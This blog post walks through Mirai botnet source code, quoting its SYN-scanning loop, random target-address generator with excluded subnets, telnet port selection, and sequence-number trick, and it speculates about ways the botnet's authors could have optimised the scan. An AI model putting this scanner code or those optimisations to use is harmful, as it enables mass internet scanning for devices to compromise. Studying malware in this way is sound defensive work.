Play-by-play of the Mirai botnet source code

In this entry about the Mirai botnet, we start digging into the parts of the Mirai code that set it apart from most botnets of its day. The portion below, the beginning of the "Main logic loop", sends out SCANNER_RAW_PPS (160) SYN packets to random IP addresses around the world. This is the first stage of what is known as SYN scanning.

    // Main logic loop
    while (TRUE)
    {
        // (A)
        fd_set fdset_rd, fdset_wr;
        struct scanner_connection *conn;
        struct timeval tim;
        int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;

        // (B)
        // Spew out SYN to try and get a response
        if (fake_time != last_spew)
        {
            last_spew = fake_time;

            // (C)
            for (i = 0; i < SCANNER_RAW_PPS; i++)
            {
                struct sockaddr_in paddr = {0};
                struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

                iph->id = rand_next();
                iph->saddr = LOCAL_ADDR;
                iph->daddr = get_random_ip();
                iph->check = 0;
                iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));

                // (D)
                if (i % 10 == 0)
                {
                    tcph->dest = htons(2323);
                }
                else
                {
                    tcph->dest = htons(23);
                }
               
                tcph->seq = iph->daddr; // !!!
                tcph->check = 0;
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));

                paddr.sin_family = AF_INET;
                paddr.sin_addr.s_addr = iph->daddr;
                paddr.sin_port = tcph->dest;

                // (E)
                sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
            }
        }

In segment (A), the variables used later in the loop are declared. Only mfd_rd and mfd_wr are given initial values here; the rest, including last_spew, are declared without one.

In segment (B), the code checks whether fake_time differs from last_spew. The variable fake_time holds the device's current system time, set by the following code:

    fake_time = time(NULL);

This code sets fake_time to the epoch time in whole seconds, so fake_time != last_spew only becomes true once the clock has ticked over to a new second since last_spew was last set equal to fake_time. In effect, this rate-limits the sending of SYN packets: the code inside the conditional runs at most once per clock second.
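The gating logic is easy to isolate. Here is a minimal sketch, assuming we pass the clock value in explicitly so it can be exercised without waiting on a real clock; should_spew is a hypothetical helper name of mine and does not appear in the Mirai source.

```c
#include <time.h>

/* Hypothetical helper (not from the Mirai source): returns 1 the first
   time it sees a given second value and 0 for every later call within
   that same second, mirroring the fake_time != last_spew test. */
static int should_spew(time_t now, time_t *last_spew)
{
    if (now != *last_spew) {
        *last_spew = now;   /* remember the second we fired in */
        return 1;
    }
    return 0;
}
```

Calling it twice with the same timestamp fires only once; calling it again with the next second's timestamp fires again.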

In segment (C), a for loop runs SCANNER_RAW_PPS (160) times, each time sending out a SYN packet to some address. The header values needed to craft a TCP SYN packet are set here:

    struct sockaddr_in paddr = {0};
    struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
    struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

    iph->id = rand_next();
    iph->saddr = LOCAL_ADDR;
    iph->daddr = get_random_ip();
    iph->check = 0;
    iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
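The two iph->check lines follow the usual pattern for the Internet checksum: the field is zeroed first, because it is itself part of the data being summed, and then filled in with the result. The sketch below is my own RFC 1071 style implementation for illustration, not Mirai's checksum_generic; inet_checksum is a hypothetical name, and it reads the buffer byte by byte as big-endian words so the result does not depend on the host's byte order.

```c
#include <stddef.h>
#include <stdint.h>

/* Illustrative RFC 1071 style checksum (not Mirai's checksum_generic).
   Words are read big-endian, so the return value is in host order and
   would need htons() before being stored in a real header. */
static uint16_t inet_checksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    size_t i;

    /* Add up the buffer as 16-bit big-endian words. */
    for (i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)((buf[i] << 8) | buf[i + 1]);

    /* An odd trailing byte is padded with a zero low byte. */
    if (len & 1)
        sum += (uint32_t)(buf[len - 1] << 8);

    /* Fold the carries back into the low 16 bits. */
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);

    return (uint16_t)~sum;
}
```

A handy property for checking a header: once the computed value is written into the checksum field, running the same function over the whole header returns 0.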

The most interesting value set here, in my opinion, is daddr (the destination IP address), which is set using the following function:

    static ipv4_t get_random_ip(void)
    {
        uint32_t tmp;
        uint8_t o1, o2, o3, o4;

        do
        {
            tmp = rand_next();

            o1 = tmp & 0xff;
            o2 = (tmp >> 8) & 0xff;
            o3 = (tmp >> 16) & 0xff;
            o4 = (tmp >> 24) & 0xff;
        }
        while (o1 == 127 ||                             // 127.0.0.0/8      - Loopback
              (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space
              (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company
              (o1 == 15 || o1 == 16) ||                 // 15.0.0.0/7       - Hewlett-Packard Company
              (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service
              (o1 == 10) ||                             // 10.0.0.0/8       - Internal network
              (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network
              (o1 == 172 && o2 >= 16 && o2 < 32) ||     // 172.16.0.0/14    - Internal network
              (o1 == 100 && o2 >= 64 && o2 < 127) ||    // 100.64.0.0/10    - IANA NAT reserved
              (o1 == 169 && o2 > 254) ||                // 169.254.0.0/16   - IANA NAT reserved
              (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use
              (o1 >= 224) ||                            // 224.*.*.*+       - Multicast
              (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
        );

        return INET_ADDR(o1,o2,o3,o4);
    }
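One way to get a feel for this filter is to lift a few of its conditions into a pure predicate and poke at the edges. The sketch below copies six of the conditions exactly as they are written in the listing above; is_filtered is a hypothetical name of mine, and the function is only a partial stand-in for the full do/while condition.

```c
#include <stdint.h>

/* Hypothetical helper: a subset of the conditions from get_random_ip(),
   copied as written, so boundary cases can be checked in isolation.
   Returns 1 if an address starting with o1.o2 would be rejected. */
static int is_filtered(uint8_t o1, uint8_t o2)
{
    return (o1 == 127) ||
           (o1 == 10) ||
           (o1 == 192 && o2 == 168) ||
           (o1 == 172 && o2 >= 16 && o2 < 32) ||
           (o1 == 100 && o2 >= 64 && o2 < 127) ||
           (o1 == 169 && o2 > 254);
}
```

Probing the boundaries shows that the comments and the conditions do not always agree. is_filtered(169, 254) is 0 while is_filtered(169, 255) is 1, so the 169.254.0.0/16 block named in the comment is not actually skipped. is_filtered(100, 127) is 0 even though 100.127.x.x lies inside 100.64.0.0/10. And the 172 condition covers second octets 16 through 31, which is a /12 rather than the /14 written in the comment.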

IP addresses are generated uniformly at random, save a few specific subnets which are filtered out. To me, this calls to mind a few questions:

How did they know the list of specific subnets to avoid, and could this "discovery of bad subnets" have been done automatically as the botnet grows?
Is there a better way to generate IP addresses than just uniformly at random? As demonstrated in the famous Birthday Problem, as the size of the botnet grows, the number of times your botnet tests an IP address "pigeonhole" it has already tested will increase at a surprising rate. Could IP address generation be done in a way to mitigate that?
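To put a rough number on the Birthday Problem remark: if n probes are drawn uniformly at random from a space of N addresses, the expected number of pairs of probes that land on the same address is n(n-1)/(2N). The sketch below just evaluates that formula; expected_colliding_pairs is a hypothetical name, and treating N as the full 2^32 space is a simplifying assumption of mine, since the filter above shrinks the real space somewhat.

```c
/* Expected number of pairs of probes that hit the same address when
   n probes are drawn uniformly at random from `space` addresses.
   Hypothetical helper for illustration; uses doubles to avoid overflow. */
static double expected_colliding_pairs(double n, double space)
{
    return n * (n - 1.0) / (2.0 * space);
}
```

For the classic 23 people and 365 birthdays this gives about 0.69. For 65,536 probes over 2^32 addresses it gives just under 0.5, and at 160 probes per second a single bot sends that many in roughly 410 seconds. Because the formula grows with the square of n, doubling the number of probes roughly quadruples the expected repeats.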

Moving on to segment (D), the if-else conditional sends every 10th SYN packet to port 2323 and the other 9 to port 23. This is because telnet uses port 23 most of the time, but some devices run telnet on port 2323. Presumably some tuning was done to check whether it really is about 10% of devices that use telnet on port 2323. Perhaps the botnet authors could have optimized this even further by measuring the actual distribution of ports that telnet is used on.
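As a quick sanity check on that split, here is a small sketch that applies the same i % 10 rule over one burst and counts the packets per port. pick_port and count_port are hypothetical helper names; SCANNER_RAW_PPS is redefined locally with the value 160 quoted earlier in this post.

```c
#include <stdint.h>

#define SCANNER_RAW_PPS 160  /* value quoted earlier in the post */

/* Same rule as segment (D): every 10th packet goes to port 2323. */
static uint16_t pick_port(int i)
{
    return (i % 10 == 0) ? 2323 : 23;
}

/* Count how many packets in one burst target the given port. */
static int count_port(uint16_t port)
{
    int i, n = 0;

    for (i = 0; i < SCANNER_RAW_PPS; i++)
        if (pick_port(i) == port)
            n++;
    return n;
}
```

Per burst of 160, that works out to 16 probes on port 2323 and 144 on port 23.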

The even more interesting part of segment (D), I think, is the line I have marked with "!!!". In the TCP handshake, the sequence number evolves in a very predictable way. For a more detailed but still readable explanation of how it evolves, check out this awesome resource from packetlife.net. In short, when the server (victim device) receives a SYN packet from the client (botnet-controlled device), the server takes the SYN packet's sequence number, adds 1 to it, and returns the result to the client as the acknowledgement number of the SYN-ACK packet. The packetlife.net resource includes a diagram of this exchange.

Mirai sets this sequence number to a predictable value, the destination address of the device being probed. That way it can always tell a SYN-ACK answering one of its own probes apart from a SYN-ACK answering a SYN packet the device sent during normal use: it just checks whether the SYN-ACK's acknowledgement number equals the destination address + 1. This idea was likely derived from SYN cookies, a concept used for DDoS mitigation, which I will explore in a later blog post. The fact that the Mirai authors took an idea created for DDoS mitigation and reimagined it to enable DDoS attacks speaks to their creativity. To me, the solution also feels elegant in its irony.
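The check described above can be sketched as a small predicate. This is my own illustration, not code taken from the Mirai source; is_probe_reply is a hypothetical name, and both arguments are assumed to be in network byte order, as they would be when read straight out of a received packet's IP and TCP headers. The source address of the SYN-ACK is the address the probe was sent to.

```c
#include <stdint.h>
#include <arpa/inet.h>

/* Hypothetical helper: returns 1 if a SYN-ACK arriving from src_addr
   acknowledges a probe whose sequence number was set to that same
   address, i.e. ack == address + 1. Both arguments are assumed to be
   in network byte order. */
static int is_probe_reply(uint32_t src_addr, uint32_t ack_seq)
{
    /* Convert to host order so that the "+ 1" is ordinary arithmetic. */
    return (uint32_t)(ntohl(ack_seq) - 1) == ntohl(src_addr);
}
```

No per-probe state is needed for this: the reply itself carries enough information to decide whether it belongs to the scan.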

In segment (E), the SYN-spewing code concludes by sending the SYN packet out to the internet via a raw socket.

Stay tuned for the next installment on the Mirai botnet, where we will discuss how the scanners in the botnet process received SYN-ACKs!
